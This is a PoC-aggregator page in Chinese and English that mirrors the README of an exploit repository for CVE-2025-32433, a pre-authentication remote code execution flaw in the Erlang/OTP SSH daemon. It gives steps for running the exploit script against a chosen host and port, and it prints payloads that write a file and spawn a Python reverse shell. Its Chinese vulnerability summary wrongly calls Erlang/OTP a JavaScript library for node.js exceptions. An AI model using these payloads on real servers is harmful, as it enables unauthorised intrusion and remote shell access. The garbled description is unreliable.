POC详情: de03ba7e4d9ce80b5d83a7e2ce2d4102b609a62a

来源
https://github.com/Mdusmandasthaheer/CVE-2025-32433
关联漏洞
标题: Erlang/OTP 访问控制错误漏洞 (CVE-2025-32433)
描述:Erlang/OTP是Erlang/OTP开源的一个JavaScript编写的处理处理异常的库。该库可以捕捉node.js内置API引发的异常。 Erlang/OTP 27.3.3之前版本存在访问控制错误漏洞,该漏洞源于SSH协议消息处理缺陷,可能导致远程代码执行。
介绍
<h1>CVE-2025-32433 – Erlang/OTP SSH RCE Vulnerability</h1>

<h2>📌 Summary</h2>
<p>
  <strong>CVE-2025-32433</strong> is a <strong>remote code execution (RCE)</strong> vulnerability affecting the Erlang/OTP SSH daemon.
  The root cause is improper handling of <em>pre-authentication</em> SSH channel requests which can be crafted by an attacker to
  cause arbitrary command execution <strong>before authentication</strong>. 
  The included PoC demonstrates sending such crafted SSH packets; by default it writes <code>/lab.txt</code> on the target but can be adapted for other commands.
</p>

<div style="background:#fef2f2; border-left:4px solid #ef4444; padding:10px; border-radius:6px; margin:16px 0;">
  ⚠️ <strong>Disclaimer:</strong> This repository is for <strong>educational and research purposes only</strong>. 
  Do not use against systems without explicit permission.
</div>

<h2>🛠️ Usage</h2>
<ol>
  <li>Edit target details in the PoC script:</li>
</ol>

<pre><code>HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
</code></pre>

<ol start="2">
  <li>Run the exploit:</li>
</ol>

<pre><code>python3 cve-2025-32433.py
</code></pre>

<p>
  By default it creates <code>/lab.txt</code> containing <code>pwned</code>. 
  Modify the payload in <code>build_channel_request</code> to run your own commands.
</p>

<h2>🧩 Example Payloads</h2>
<pre><code># Write a file
file:write_file("/lab.txt", <<"pwned">>).

# Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect((\"127.0.0.1\",2222));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2); import pty; pty.spawn(\"sh\")'")
</code></pre>

<h2>🔧 How the PoC Works (short)</h2>
<ul>
  <li>Connects to the SSH service and exchanges banners.</li>
  <li>Sends a crafted <code>SSH_MSG_KEXINIT</code> to look like a normal handshake.</li>
  <li>Sends <code>SSH_MSG_CHANNEL_OPEN</code> and <code>SSH_MSG_CHANNEL_REQUEST</code> with an <code>exec</code> payload <em>before authentication</em>.</li>
  <li>If vulnerable, the server executes the supplied Erlang command.</li>
</ul>

<h2>🙏 Credits</h2>
<p>
  Discovery and write-up by <strong>Matt Keeley</strong> (Platform Security).  
  Thanks to him for publishing the PoC and sharing details.  
</p>
<p>
  Blog link: <a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">https://platformsecurity.com/blog/CVE-2025-32433-poc</a>
</p>

<h2>📚 References</h2>
<ul>
  <li><a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">Matt Keeley’s blog</a></li>
  <li><a href="https://www.erlang.org/news" target="_blank">Erlang/OTP Security Advisories</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433" target="_blank">MITRE CVE Record</a></li>
文件快照

 [4.0K]  /data/pocs/de03ba7e4d9ce80b5d83a7e2ce2d4102b609a62a
├── [4.1K]  exploit.py
└── [2.8K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。